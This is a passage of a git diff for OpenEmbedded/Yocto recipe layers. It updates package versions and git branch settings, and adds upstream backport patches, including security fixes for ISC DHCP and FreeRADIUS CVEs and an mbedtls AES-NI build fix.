diff options
420 files changed, 51633 insertions, 1301 deletions
diff --git a/meta-filesystems/recipes-filesystems/ntfs-3g-ntfsprogs/ntfs-3g-ntfsprogs_2022.5.17.bb b/meta-filesystems/recipes-filesystems/ntfs-3g-ntfsprogs/ntfs-3g-ntfsprogs_2022.10.3.bb index b29716ad49..37a8106bb0 100644 --- a/meta-filesystems/recipes-filesystems/ntfs-3g-ntfsprogs/ntfs-3g-ntfsprogs_2022.5.17.bb +++ b/meta-filesystems/recipes-filesystems/ntfs-3g-ntfsprogs/ntfs-3g-ntfsprogs_2022.10.3.bb @@ -10,7 +10,7 @@ SRC_URI = "http://tuxera.com/opensource/ntfs-3g_ntfsprogs-${PV}.tgz \ file://0001-libntfs-3g-Makefile.am-fix-install-failed-while-host.patch \ " S = "${WORKDIR}/ntfs-3g_ntfsprogs-${PV}" -SRC_URI[sha256sum] = "0489fbb6972581e1b417ab578d543f6ae522e7fa648c3c9b49c789510fd5eb93" +SRC_URI[sha256sum] = "f20e36ee68074b845e3629e6bced4706ad053804cbaf062fbae60738f854170c" UPSTREAM_CHECK_URI = "https://www.tuxera.com/community/open-source-ntfs-3g/" UPSTREAM_CHECK_REGEX = "ntfs-3g_ntfsprogs-(?P<pver>\d+(\.\d+)+)\.tgz" diff --git a/meta-gnome/recipes-connectivity/geary/geary_40.0.bb b/meta-gnome/recipes-connectivity/geary/geary_40.0.bb index 501b27a544..7faa69c55c 100644 --- a/meta-gnome/recipes-connectivity/geary/geary_40.0.bb +++ b/meta-gnome/recipes-connectivity/geary/geary_40.0.bb @@ -33,7 +33,7 @@ RDEPENDS:${PN} = "gnome-keyring" inherit meson pkgconfig mime-xdg gtk-icon-cache gobject-introspection vala features_check SRC_URI = " \ - git://github.com/GNOME/geary.git;nobranch=1;protocol=https \ + git://github.com/GNOME/geary.git;branch=main;protocol=https \ file://0001-Util.Cache.Lru-Workaround-missing-generic-type-argum.patch \ file://0002-Fix-accessibility-issues-with-initializer-of-constan.patch \ " diff --git a/meta-initramfs/recipes-devtools/grubby/grubby_git.bb b/meta-initramfs/recipes-devtools/grubby/grubby_git.bb index a276bf423c..7c40c52cf6 100644 --- a/meta-initramfs/recipes-devtools/grubby/grubby_git.bb +++ b/meta-initramfs/recipes-devtools/grubby/grubby_git.bb @@ -14,7 +14,7 @@ DEPENDS:append:libc-musl = " libexecinfo" S = "${WORKDIR}/git" SRCREV = "a1d2ae93408c3408e672d7eba4550fdf27fb0201" -SRC_URI = "git://github.com/rhboot/grubby.git;protocol=https;;branch=master \ +SRC_URI = "git://github.com/rhboot/grubby.git;protocol=https;branch=main \ file://grubby-rename-grub2-editenv-to-grub-editenv.patch \ file://run-ptest \ file://0001-Add-another-variable-LIBS-to-provides-libraries-from.patch \ diff --git a/meta-multimedia/recipes-multimedia/dleyna/dleyna-renderer_0.6.0.bb b/meta-multimedia/recipes-multimedia/dleyna/dleyna-renderer_0.6.0.bb index 3e43c0d2a7..e7f918333a 100644 --- a/meta-multimedia/recipes-multimedia/dleyna/dleyna-renderer_0.6.0.bb +++ b/meta-multimedia/recipes-multimedia/dleyna/dleyna-renderer_0.6.0.bb @@ -22,4 +22,4 @@ inherit autotools pkgconfig CFLAGS += " -I${S}" FILES:${PN} += "${datadir}/dbus-1" -FILES:${PN}-dev += "${libdir}/${PN}/*.so" +FILES:${PN}-dev += "${libdir}/${BPN}/*.so" diff --git a/meta-multimedia/recipes-multimedia/dleyna/dleyna-server_0.6.0.bb b/meta-multimedia/recipes-multimedia/dleyna/dleyna-server_0.6.0.bb index b25e446c41..071379758c 100644 --- a/meta-multimedia/recipes-multimedia/dleyna/dleyna-server_0.6.0.bb +++ b/meta-multimedia/recipes-multimedia/dleyna/dleyna-server_0.6.0.bb @@ -19,4 +19,4 @@ S = "${WORKDIR}/git" inherit autotools pkgconfig FILES:${PN} += "${datadir}/dbus-1" -FILES:${PN}-dev += "${libdir}/${PN}/*.so" +FILES:${PN}-dev += "${libdir}/${BPN}/*.so" diff --git a/meta-multimedia/recipes-multimedia/fluidsynth/fluidsynth.inc b/meta-multimedia/recipes-multimedia/fluidsynth/fluidsynth.inc index 14d09e5f0b..a4590d61a9 100644 --- a/meta-multimedia/recipes-multimedia/fluidsynth/fluidsynth.inc +++ b/meta-multimedia/recipes-multimedia/fluidsynth/fluidsynth.inc @@ -4,7 +4,7 @@ SECTION = "libs/multimedia" LICENSE = "LGPL-2.1-only" LIC_FILES_CHKSUM = "file://LICENSE;md5=fc178bcd425090939a8b634d1d6a9594" -SRC_URI = "git://github.com/FluidSynth/fluidsynth.git;branch=2.2.x;protocol=https" +SRC_URI = "git://github.com/FluidSynth/fluidsynth.git;branch=master;protocol=https" SRCREV = "8b00644751578ba67b709a827cbe5133d849d339" S = "${WORKDIR}/git" PV = "2.2.6" diff --git a/meta-multimedia/recipes-multimedia/musicpd/mpd_0.23.6.bb b/meta-multimedia/recipes-multimedia/musicpd/mpd_0.23.12.bb index c74f1074cc..13938444c8 100644 --- a/meta-multimedia/recipes-multimedia/musicpd/mpd_0.23.6.bb +++ b/meta-multimedia/recipes-multimedia/musicpd/mpd_0.23.12.bb @@ -21,7 +21,7 @@ DEPENDS += " \ SRC_URI = "git://github.com/MusicPlayerDaemon/MPD;branch=v0.23.x;protocol=https \ file://mpd.conf.in \ " -SRCREV = "f591193ddaa7f9bcb6c85ff5899517fc7b53e35a" +SRCREV = "d91da9679801224847c30147f5914785b6f8f240" S = "${WORKDIR}/git" EXTRA_OEMESON += "${@bb.utils.contains('DISTRO_FEATURES', 'systemd', '-Dsystemd=enabled -Dsystemd_system_unit_dir=${systemd_system_unitdir} -Dsystemd_user_unit_dir=${systemd_system_unitdir}', '-Dsystemd=disabled', d)}" diff --git a/meta-multimedia/recipes-multimedia/musicpd/ncmpc/0001-SearchPage-use-regular-integer-to-fix-Wenum-constexp.patch b/meta-multimedia/recipes-multimedia/musicpd/ncmpc/0001-SearchPage-use-regular-integer-to-fix-Wenum-constexp.patch new file mode 100644 index 0000000000..92094af1f2 --- /dev/null +++ b/meta-multimedia/recipes-multimedia/musicpd/ncmpc/0001-SearchPage-use-regular-integer-to-fix-Wenum-constexp.patch @@ -0,0 +1,37 @@ +From 2e8dc2c28c0938dbbb85ebbac2b9a60be9ccd9f3 Mon Sep 17 00:00:00 2001 +From: Max Kellermann <max@musicpd.org> +Date: Wed, 23 Nov 2022 12:25:50 +0100 +Subject: [PATCH] SearchPage: use regular integer to fix -Wenum-constexpr-conversion + +Upstream-Status: Backport [https://github.com/MusicPlayerDaemon/ncmpc/commit/ddd1757907f0376b5843f707bf182b7827ff6591] +--- + src/SearchPage.cxx | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/src/SearchPage.cxx b/src/SearchPage.cxx +index 2fa5edbc..3f91c4fe 100644 +--- a/src/SearchPage.cxx ++++ b/src/SearchPage.cxx +@@ -81,7 +81,7 @@ search_get_tag_id(const char *name) + } + + struct SearchMode { +- enum mpd_tag_type table; ++ int table; + const char *label; + }; + +@@ -89,8 +89,8 @@ static constexpr SearchMode mode[] = { + { MPD_TAG_TITLE, N_("Title") }, + { MPD_TAG_ARTIST, N_("Artist") }, + { MPD_TAG_ALBUM, N_("Album") }, +- { (enum mpd_tag_type)SEARCH_URI, N_("Filename") }, +- { (enum mpd_tag_type)SEARCH_ARTIST_TITLE, N_("Artist + Title") }, ++ { SEARCH_URI, N_("Filename") }, ++ { SEARCH_ARTIST_TITLE, N_("Artist + Title") }, + { MPD_TAG_COUNT, nullptr } + }; + +-- +2.39.0 + diff --git a/meta-multimedia/recipes-multimedia/musicpd/ncmpc_0.46.bb b/meta-multimedia/recipes-multimedia/musicpd/ncmpc_0.47.bb index a77d4f9783..44046912ed 100644 --- a/meta-multimedia/recipes-multimedia/musicpd/ncmpc_0.46.bb +++ b/meta-multimedia/recipes-multimedia/musicpd/ncmpc_0.47.bb @@ -34,6 +34,7 @@ PACKAGECONFIG[chat_screen] = "-Dchat_screen=true,-Dchat_screen=false" SRC_URI = " \ git://github.com/MusicPlayerDaemon/ncmpc;branch=master;protocol=https \ + file://0001-SearchPage-use-regular-integer-to-fix-Wenum-constexp.patch \ " -SRCREV = "b9b5e11e10d8f66cd672ffb51728aa447f78ecd4" +SRCREV = "fc8de01c71acdf10ad07c7aae756dc522b848124" S = "${WORKDIR}/git" diff --git a/meta-multimedia/recipes-multimedia/packagegroups/packagegroup-meta-multimedia.bb b/meta-multimedia/recipes-multimedia/packagegroups/packagegroup-meta-multimedia.bb index 2b7a43b93d..b0fce73b53 100644 --- a/meta-multimedia/recipes-multimedia/packagegroups/packagegroup-meta-multimedia.bb +++ b/meta-multimedia/recipes-multimedia/packagegroups/packagegroup-meta-multimedia.bb @@ -55,7 +55,7 @@ RDEPENDS:packagegroup-meta-multimedia = "\ tearsofsteel-1080p \ schroedinger \ pipewire \ - ${@bb.utils.contains("LICENSE_FLAGS_ACCEPTED", "commercial", "projucer", "", d)} \ + ${@bb.utils.contains("LICENSE_FLAGS_ACCEPTED", "commercial", bb.utils.contains("DISTRO_FEATURES", "x11", "projucer", "", d), "", d)} \ libcamera \ ${@bb.utils.contains("LICENSE_FLAGS_ACCEPTED", "commercial", "libde265 openh264", "", d)} \ vorbis-tools \ diff --git a/meta-networking/classes/kernel_wireless_regdb.bbclass b/meta-networking/classes/kernel_wireless_regdb.bbclass index 1238172bd4..9ad566c837 100644 --- a/meta-networking/classes/kernel_wireless_regdb.bbclass +++ b/meta-networking/classes/kernel_wireless_regdb.bbclass @@ -17,4 +17,4 @@ do_kernel_add_regdb() { cp ${STAGING_LIBDIR_NATIVE}/crda/db.txt ${S}/net/wireless/db.txt } do_kernel_add_regdb[dirs] = "${S}" -addtask kernel_add_regdb before do_build after do_configure +addtask kernel_add_regdb before do_compile after do_configure diff --git a/meta-networking/licenses/netperf b/meta-networking/licenses/netperf deleted file mode 100644 index 3f3ceb2fc2..0000000000 --- a/meta-networking/licenses/netperf +++ /dev/null @@ -1,43 +0,0 @@ - - - Copyright (C) 1993 Hewlett-Packard Company - ALL RIGHTS RESERVED. - - The enclosed software and documentation includes copyrighted works - of Hewlett-Packard Co. For as long as you comply with the following - limitations, you are hereby authorized to (i) use, reproduce, and - modify the software and documentation, and to (ii) distribute the - software and documentation, including modifications, for - non-commercial purposes only. - - 1. The enclosed software and documentation is made available at no - charge in order to advance the general development of - high-performance networking products. - - 2. You may not delete any copyright notices contained in the - software or documentation. All hard copies, and copies in - source code or object code form, of the software or - documentation (including modifications) must contain at least - one of the copyright notices. - - 3. The enclosed software and documentation has not been subjected - to testing and quality control and is not a Hewlett-Packard Co. - product. At a future time, Hewlett-Packard Co. may or may not - offer a version of the software and documentation as a product. - - 4. THE SOFTWARE AND DOCUMENTATION IS PROVIDED "AS IS". - HEWLETT-PACKARD COMPANY DOES NOT WARRANT THAT THE USE, - REPRODUCTION, MODIFICATION OR DISTRIBUTION OF THE SOFTWARE OR - DOCUMENTATION WILL NOT INFRINGE A THIRD PARTY'S INTELLECTUAL - PROPERTY RIGHTS. HP DOES NOT WARRANT THAT THE SOFTWARE OR - DOCUMENTATION IS ERROR FREE. HP DISCLAIMS ALL WARRANTIES, - EXPRESS AND IMPLIED, WITH REGARD TO THE SOFTWARE AND THE - DOCUMENTATION. HP SPECIFICALLY DISCLAIMS ALL WARRANTIES OF - MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. - - 5. HEWLETT-PACKARD COMPANY WILL NOT IN ANY EVENT BE LIABLE FOR ANY - DIRECT, INDIRECT, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES - (INCLUDING LOST PROFITS) RELATED TO ANY USE, REPRODUCTION, - MODIFICATION, OR DISTRIBUTION OF THE SOFTWARE OR DOCUMENTATION. - - diff --git a/meta-networking/recipes-connectivity/dhcp/dhcp-relay_4.4.3.bb b/meta-networking/recipes-connectivity/dhcp/dhcp-relay_4.4.3.bb index 92c648708e..499b035040 100644 --- a/meta-networking/recipes-connectivity/dhcp/dhcp-relay_4.4.3.bb +++ b/meta-networking/recipes-connectivity/dhcp/dhcp-relay_4.4.3.bb @@ -17,6 +17,8 @@ SRC_URI = "https://downloads.isc.org/isc/dhcp/${PV}/dhcp-${PV}.tar.gz \ file://0001-Makefile.am-only-build-dhcrelay.patch \ file://0002-bind-Makefile.in-disable-backtrace.patch \ file://0003-bind-Makefile.in-regenerate-configure.patch \ + file://CVE-2022-2928.patch \ + file://CVE-2022-2929.patch \ " SRC_URI[sha256sum] = "0e3ec6b4c2a05ec0148874bcd999a66d05518378d77421f607fb0bc9d0135818" diff --git a/meta-networking/recipes-connectivity/dhcp/files/CVE-2022-2928.patch b/meta-networking/recipes-connectivity/dhcp/files/CVE-2022-2928.patch new file mode 100644 index 0000000000..247e8dec68 --- /dev/null +++ b/meta-networking/recipes-connectivity/dhcp/files/CVE-2022-2928.patch @@ -0,0 +1,120 @@ +From 2e08d138ff852820a6e87a09088d2dc2cdd15e56 Mon Sep 17 00:00:00 2001 +From: Hitendra Prajapati <hprajapati@mvista.com> +Date: Mon, 10 Oct 2022 09:57:15 +0530 +Subject: [PATCH 1/2] CVE-2022-2928 + +Upstream-Status: Backport [https://downloads.isc.org/isc/dhcp/4.4.3-P1/patches/] +CVE: CVE-2022-2928 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + common/options.c | 7 +++++ + common/tests/option_unittest.c | 54 ++++++++++++++++++++++++++++++++++ + 2 files changed, 61 insertions(+) + +diff --git a/common/options.c b/common/options.c +index 92c8fee..f0959cb 100644 +--- a/common/options.c ++++ b/common/options.c +@@ -4452,6 +4452,8 @@ add_option(struct option_state *options, + if (!option_cache_allocate(&oc, MDL)) { + log_error("No memory for option cache adding %s (option %d).", + option->name, option_num); ++ /* Get rid of reference created during hash lookup. */ ++ option_dereference(&option, MDL); + return 0; + } + +@@ -4463,6 +4465,8 @@ add_option(struct option_state *options, + MDL)) { + log_error("No memory for constant data adding %s (option %d).", + option->name, option_num); ++ /* Get rid of reference created during hash lookup. */ ++ option_dereference(&option, MDL); + option_cache_dereference(&oc, MDL); + return 0; + } +@@ -4471,6 +4475,9 @@ add_option(struct option_state *options, + save_option(&dhcp_universe, options, oc); + option_cache_dereference(&oc, MDL); + ++ /* Get rid of reference created during hash lookup. */ ++ option_dereference(&option, MDL); ++ + return 1; + } + +diff --git a/common/tests/option_unittest.c b/common/tests/option_unittest.c +index 600ebe6..963b566 100644 +--- a/common/tests/option_unittest.c ++++ b/common/tests/option_unittest.c +@@ -213,6 +213,59 @@ ATF_TC_BODY(parse_X, tc) + } + } + ++ATF_TC(add_option_ref_cnt); ++ ++ATF_TC_HEAD(add_option_ref_cnt, tc) ++{ ++ atf_tc_set_md_var(tc, "descr", ++ "Verify add_option() does not leak option ref counts."); ++} ++ ++ATF_TC_BODY(add_option_ref_cnt, tc) ++{ ++ struct option_state *options = NULL; ++ struct option *option = NULL; ++ unsigned int cid_code = DHO_DHCP_CLIENT_IDENTIFIER; ++ char *cid_str = "1234"; ++ int refcnt_before = 0; ++ ++ // Look up the option we're going to add. ++ initialize_common_option_spaces(); ++ if (!option_code_hash_lookup(&option, dhcp_universe.code_hash, ++ &cid_code, 0, MDL)) { ++ atf_tc_fail("cannot find option definition?"); ++ } ++ ++ // Get the option's reference count before we call add_options. ++ refcnt_before = option->refcnt; ++ ++ // Allocate a option_state to which to add an option. ++ if (!option_state_allocate(&options, MDL)) { ++ atf_tc_fail("cannot allocat options state"); ++ } ++ ++ // Call add_option() to add the option to the option state. ++ if (!add_option(options, cid_code, cid_str, strlen(cid_str))) { ++ atf_tc_fail("add_option returned 0"); ++ } ++ ++ // Verify that calling add_option() only adds 1 to the option ref count. ++ if (option->refcnt != (refcnt_before + 1)) { ++ atf_tc_fail("after add_option(), count is wrong, before %d, after: %d", ++ refcnt_before, option->refcnt); ++ } ++ ++ // Derefrence the option_state, this should reduce the ref count to ++ // it's starting value. ++ option_state_dereference(&options, MDL); ++ ++ // Verify that dereferencing option_state restores option ref count. ++ if (option->refcnt != refcnt_before) { ++ atf_tc_fail("after state deref, count is wrong, before %d, after: %d", ++ refcnt_before, option->refcnt); ++ } ++} ++ + /* This macro defines main() method that will call specified + test cases. tp and simple_test_case names can be whatever you want + as long as it is a valid variable identifier. */ +@@ -221,6 +274,7 @@ ATF_TP_ADD_TCS(tp) + ATF_TP_ADD_TC(tp, option_refcnt); + ATF_TP_ADD_TC(tp, pretty_print_option); + ATF_TP_ADD_TC(tp, parse_X); ++ ATF_TP_ADD_TC(tp, add_option_ref_cnt); + + return (atf_no_error()); + } +-- +2.25.1 + diff --git a/meta-networking/recipes-connectivity/dhcp/files/CVE-2022-2929.patch b/meta-networking/recipes-connectivity/dhcp/files/CVE-2022-2929.patch new file mode 100644 index 0000000000..faaac4868c --- /dev/null +++ b/meta-networking/recipes-connectivity/dhcp/files/CVE-2022-2929.patch @@ -0,0 +1,40 @@ +From 5436cafe1d7df409a44ff5f610248db57f0677ee Mon Sep 17 00:00:00 2001 +From: Hitendra Prajapati <hprajapati@mvista.com> +Date: Mon, 10 Oct 2022 09:58:04 +0530 +Subject: [PATCH 2/2] CVE-2022-2929 + +Upstream-Status: Backport [https://downloads.isc.org/isc/dhcp/4.4.3-P1/patches/] +CVE: CVE-2022-2929 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + common/options.c | 8 ++++---- + 1 file changed, 4 insertions(+), 4 deletions(-) + +diff --git a/common/options.c b/common/options.c +index f0959cb..25450e1 100644 +--- a/common/options.c ++++ b/common/options.c +@@ -454,16 +454,16 @@ int fqdn_universe_decode (struct option_state *options, + while (s < &bp -> data[0] + length + 2) { + len = *s; + if (len > 63) { +- log_info ("fancy bits in fqdn option"); +- return 0; ++ log_info ("label length exceeds 63 in fqdn option"); ++ goto bad; + } + if (len == 0) { + terminated = 1; + break; + } + if (s + len > &bp -> data [0] + length + 3) { +- log_info ("fqdn tag longer than buffer"); +- return 0; ++ log_info ("fqdn label longer than buffer"); ++ goto bad; + } + + if (first_len == 0) { +-- +2.25.1 + diff --git a/meta-networking/recipes-connectivity/freeradius/files/CVE-2022-41860.patch b/meta-networking/recipes-connectivity/freeradius/files/CVE-2022-41860.patch new file mode 100644 index 0000000000..4ea519c752 --- /dev/null +++ b/meta-networking/recipes-connectivity/freeradius/files/CVE-2022-41860.patch @@ -0,0 +1,118 @@ +From f1cdbb33ec61c4a64a32e107d4d02f936051c708 Mon Sep 17 00:00:00 2001 +From: "Alan T. DeKok" <aland@freeradius.org> +Date: Mon, 7 Feb 2022 22:26:05 -0500 +Subject: [PATCH] it's probably wrong to be completely retarded. Let's fix + that. + +CVE: CVE-2022-41860 + +Upstream-Status: Backport +[https://github.com/FreeRADIUS/freeradius-server/commit/f1cdbb33ec61c4a64a32e107d4d02f936051c708] + +Signed-off-by: Yi Zhao <yi.zhao@windriver.com> +--- + src/modules/rlm_eap/libeap/eapsimlib.c | 69 +++++++++++++++++++------- + 1 file changed, 52 insertions(+), 17 deletions(-) + +diff --git a/src/modules/rlm_eap/libeap/eapsimlib.c b/src/modules/rlm_eap/libeap/eapsimlib.c +index cf1e8a7dd9..e438a844ea 100644 +--- a/src/modules/rlm_eap/libeap/eapsimlib.c ++++ b/src/modules/rlm_eap/libeap/eapsimlib.c +@@ -307,42 +307,77 @@ int unmap_eapsim_basictypes(RADIUS_PACKET *r, + newvp->vp_length = 1; + fr_pair_add(&(r->vps), newvp); + ++ /* ++ * EAP-SIM has a 1 octet of subtype, and 2 octets ++ * reserved. ++ */ + attr += 3; + attrlen -= 3; + +- /* now, loop processing each attribute that we find */ +- while(attrlen > 0) { ++ /* ++ * Loop over each attribute. The format is: ++ * ++ * 1 octet of type ++ * 1 octet of length (value 1..255) ++ * ((4 * length) - 2) octets of data. ++ */ ++ while (attrlen > 0) { + uint8_t *p; + +- if(attrlen < 2) { ++ if (attrlen < 2) { + fr_strerror_printf("EAP-Sim attribute %d too short: %d < 2", es_attribute_count, attrlen); + return 0; + } + ++ if (!attr[1]) { ++ fr_strerror_printf("EAP-Sim attribute %d (no.%d) has no data", eapsim_attribute, ++ es_attribute_count); ++ return 0; ++ } ++ + eapsim_attribute = attr[0]; + eapsim_len = attr[1] * 4; + ++ /* ++ * The length includes the 2-byte header. ++ */ + if (eapsim_len > attrlen) { + fr_strerror_printf("EAP-Sim attribute %d (no.%d) has length longer than data (%d > %d)", + eapsim_attribute, es_attribute_count, eapsim_len, attrlen); + return 0; + } + +- if(eapsim_len > MAX_STRING_LEN) { +- eapsim_len = MAX_STRING_LEN; +- } +- if (eapsim_len < 2) { +- fr_strerror_printf("EAP-Sim attribute %d (no.%d) has length too small", eapsim_attribute, +- es_attribute_count); +- return 0; +- } ++ newvp = fr_pair_afrom_num(r, eapsim_attribute + PW_EAP_SIM_BASE, 0); ++ if (!newvp) { ++ /* ++ * RFC 4186 Section 8.1 says 0..127 are ++ * "non-skippable". If one such ++ * attribute is found and we don't ++ * understand it, the server has to send: ++ * ++ * EAP-Request/SIM/Notification packet with an ++ * (AT_NOTIFICATION code, which implies general failure ("General ++ * failure after authentication" (0), or "General failure" (16384), ++ * depending on the phase of the exchange), which terminates the ++ * authentication exchange. ++ */ ++ if (eapsim_attribute <= 127) { ++ fr_strerror_printf("Unknown mandatory attribute %d, failing", ++ eapsim_attribute); ++ return 0; ++ } + +- newvp = fr_pair_afrom_num(r, eapsim_attribute+PW_EAP_SIM_BASE, 0); +- newvp->vp_length = eapsim_len-2; +- newvp->vp_octets = p = talloc_array(newvp, uint8_t, newvp->vp_length); +- memcpy(p, &attr[2], eapsim_len-2); +- fr_pair_add(&(r->vps), newvp); +- newvp = NULL; ++ } else { ++ /* ++ * It's known, ccount for header, and ++ * copy the value over. ++ */ ++ newvp->vp_length = eapsim_len - 2; ++ ++ newvp->vp_octets = p = talloc_array(newvp, uint8_t, newvp->vp_length); ++ memcpy(p, &attr[2], newvp->vp_length); ++ fr_pair_add(&(r->vps), newvp); ++ } + + /* advance pointers, decrement length */ + attr += eapsim_len; +-- +2.25.1 + diff --git a/meta-networking/recipes-connectivity/freeradius/files/CVE-2022-41861.patch b/meta-networking/recipes-connectivity/freeradius/files/CVE-2022-41861.patch new file mode 100644 index 0000000000..352c02137a --- /dev/null +++ b/meta-networking/recipes-connectivity/freeradius/files/CVE-2022-41861.patch @@ -0,0 +1,53 @@ +From 0ec2b39d260e08e4c3464f6b95005821dc559c62 Mon Sep 17 00:00:00 2001 +From: "Alan T. DeKok" <aland@freeradius.org> +Date: Mon, 28 Feb 2022 10:34:15 -0500 +Subject: [PATCH] manual port of commit 5906bfa1 + +CVE: CVE-2022-41861 + +Upstream-Status: Backport +[https://github.com/FreeRADIUS/freeradius-server/commit/0ec2b39d260e08e4c3464f6b95005821dc559c62] + +Signed-off-by: Yi Zhao <yi.zhao@windriver.com> +--- + src/lib/filters.c | 12 +++++++++--- + 1 file changed, 9 insertions(+), 3 deletions(-) + +diff --git a/src/lib/filters.c b/src/lib/filters.c +index 4868cd385d..3f3b63daee 100644 +--- a/src/lib/filters.c ++++ b/src/lib/filters.c +@@ -1205,13 +1205,19 @@ void print_abinary(char *out, size_t outlen, uint8_t const *data, size_t len, in + } + } + } else if (filter->type == RAD_FILTER_GENERIC) { +- int count; ++ size_t count, masklen; ++ ++ masklen = ntohs(filter->u.generic.len); ++ if (masklen >= sizeof(filter->u.generic.mask)) { ++ *p = '\0'; ++ return; ++ } + + i = snprintf(p, outlen, " %u ", (unsigned int) ntohs(filter->u.generic.offset)); + p += i; + + /* show the mask */ +- for (count = 0; count < ntohs(filter->u.generic.len); count++) { ++ for (count = 0; count < masklen; count++) { + i = snprintf(p, outlen, "%02x", filter->u.generic.mask[count]); + p += i; + outlen -= i; +@@ -1222,7 +1228,7 @@ void print_abinary(char *out, size_t outlen, uint8_t const *data, size_t len, in + outlen--; + + /* show the value */ +- for (count = 0; count < ntohs(filter->u.generic.len); count++) { ++ for (count = 0; count < masklen; count++) { + i = snprintf(p, outlen, "%02x", filter->u.generic.value[count]); + p += i; + outlen -= i; +-- +2.25.1 + diff --git a/meta-networking/recipes-connectivity/freeradius/freeradius_3.0.21.bb b/meta-networking/recipes-connectivity/freeradius/freeradius_3.0.21.bb index 1407b798b5..db37f65918 100644 --- a/meta-networking/recipes-connectivity/freeradius/freeradius_3.0.21.bb +++ b/meta-networking/recipes-connectivity/freeradius/freeradius_3.0.21.bb @@ -33,6 +33,8 @@ SRC_URI = "git://github.com/FreeRADIUS/freeradius-server.git;branch=v3.0.x;lfs=0 file://radiusd-volatiles.conf \ file://check-openssl-cmds-in-script-bootstrap.patch \ file://0001-version.c-don-t-print-build-flags.patch \ + file://CVE-2022-41860.patch \ + file://CVE-2022-41861.patch \ " raddbdir="${sysconfdir}/${MLPREFIX}raddb" diff --git a/meta-networking/recipes-connectivity/libdnet/libdnet_1.14.bb b/meta-networking/recipes-connectivity/libdnet/libdnet_1.14.bb index 9f2ff51576..c7cd21b6bf 100644 --- a/meta-networking/recipes-connectivity/libdnet/libdnet_1.14.bb +++ b/meta-networking/recipes-connectivity/libdnet/libdnet_1.14.bb @@ -4,7 +4,7 @@ SECTION = "libs" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=0036c1b155f4e999f3e0a373490b5db9" -SRC_URI = "git://github.com/dugsong/libdnet.git;nobranch=1;protocol=https" +SRC_URI = "git://github.com/dugsong/libdnet.git;branch=master;protocol=https" SRCREV = "3e782472d2a58d5e1b94d04eda4a364c2d257600" UPSTREAM_CHECK_GITTAGREGEX = "libdnet-(?P<pver>\d+(\.\d+)+)" diff --git a/meta-networking/recipes-connectivity/mbedtls/mbedtls/0001-AES-NI-use-target-attributes-for-x86-32-bit-intrinsi.patch b/meta-networking/recipes-connectivity/mbedtls/mbedtls/0001-AES-NI-use-target-attributes-for-x86-32-bit-intrinsi.patch new file mode 100644 index 0000000000..5030fb99f9 --- /dev/null +++ b/meta-networking/recipes-connectivity/mbedtls/mbedtls/0001-AES-NI-use-target-attributes-for-x86-32-bit-intrinsi.patch @@ -0,0 +1,87 @@ +From 80d3e73ad0648f558a067a9dbfe3bc80e6b614f8 Mon Sep 17 00:00:00 2001 +From: Beniamin Sandu <beniaminsandu@gmail.com> +Date: Mon, 30 Oct 2023 19:15:56 +0000 +Subject: [PATCH] AES-NI: use target attributes for x86 32-bit intrinsics + +This way we build with 32-bit gcc/clang out of the box. +We also fallback to assembly for 64-bit clang-cl if needed cpu +flags are not provided, instead of throwing an error. + +Upstream-Status: Backport [https://github.com/Mbed-TLS/mbedtls/commit/800f2b7c020678a84abfa9688962b91c36e6693d] + +Signed-off-by: Beniamin Sandu <beniaminsandu@gmail.com> +--- + library/aesni.c | 20 ++++++++++++++++++++ + library/aesni.h | 8 +++++--- + 2 files changed, 25 insertions(+), 3 deletions(-) + +diff --git a/library/aesni.c b/library/aesni.c +index 5f25a8249..481fa3822 100644 +--- a/library/aesni.c ++++ b/library/aesni.c +@@ -41,6 +41,17 @@ + #include <immintrin.h> + #endif + ++#if defined(MBEDTLS_ARCH_IS_X86) ++#if defined(MBEDTLS_COMPILER_IS_GCC) ++#pragma GCC push_options ++#pragma GCC target ("pclmul,sse2,aes") ++#define MBEDTLS_POP_TARGET_PRAGMA ++#elif defined(__clang__) ++#pragma clang attribute push (__attribute__((target("pclmul,sse2,aes"))), apply_to=function) ++#define MBEDTLS_POP_TARGET_PRAGMA ++#endif ++#endif ++ + #if !defined(MBEDTLS_AES_USE_HARDWARE_ONLY) + /* + * AES-NI support detection routine +@@ -396,6 +407,15 @@ static void aesni_setkey_enc_256(unsigned char *rk_bytes, + } + #endif /* !MBEDTLS_AES_ONLY_128_BIT_KEY_LENGTH */ + ++#if defined(MBEDTLS_POP_TARGET_PRAGMA) ++#if defined(__clang__) ++#pragma clang attribute pop ++#elif defined(__GNUC__) ++#pragma GCC pop_options ++#endif ++#undef MBEDTLS_POP_TARGET_PRAGMA ++#endif ++ + #else /* MBEDTLS_AESNI_HAVE_CODE == 1 */ + + #if defined(__has_feature) +diff --git a/library/aesni.h b/library/aesni.h +index ba1429029..37ae02c82 100644 +--- a/library/aesni.h ++++ b/library/aesni.h +@@ -50,6 +50,10 @@ + #if defined(__GNUC__) && defined(__AES__) && defined(__PCLMUL__) + #define MBEDTLS_AESNI_HAVE_INTRINSICS + #endif ++/* For 32-bit, we only support intrinsics */ ++#if defined(MBEDTLS_ARCH_IS_X86) && (defined(__GNUC__) || defined(__clang__)) ++#define MBEDTLS_AESNI_HAVE_INTRINSICS ++#endif + + /* Choose the implementation of AESNI, if one is available. + * +@@ -60,13 +64,11 @@ + #if defined(MBEDTLS_AESNI_HAVE_INTRINSICS) + #define MBEDTLS_AESNI_HAVE_CODE 2 // via intrinsics + #elif defined(MBEDTLS_HAVE_ASM) && \ +- defined(__GNUC__) && defined(MBEDTLS_ARCH_IS_X64) ++ (defined(__GNUC__) || defined(__clang__)) && defined(MBEDTLS_ARCH_IS_X64) + /* Can we do AESNI with inline assembly? + * (Only implemented with gas syntax, only for 64-bit.) + */ + #define MBEDTLS_AESNI_HAVE_CODE 1 // via assembly +-#elif defined(__GNUC__) +-# error "Must use `-mpclmul -msse2 -maes` for MBEDTLS_AESNI_C" + #else + #error "MBEDTLS_AESNI_C defined, but neither intrinsics nor assembly available" + #endif +-- +2.34.1 diff --git a/meta-networking/recipes-connectivity/mbedtls/mbedtls/run-ptest b/meta-networking/recipes-connectivity/mbedtls/mbedtls/run-ptest new file mode 100644 index 0000000000..059ab4ecbb --- /dev/null +++ b/meta-networking/recipes-connectivity/mbedtls/mbedtls/run-ptest @@ -0,0 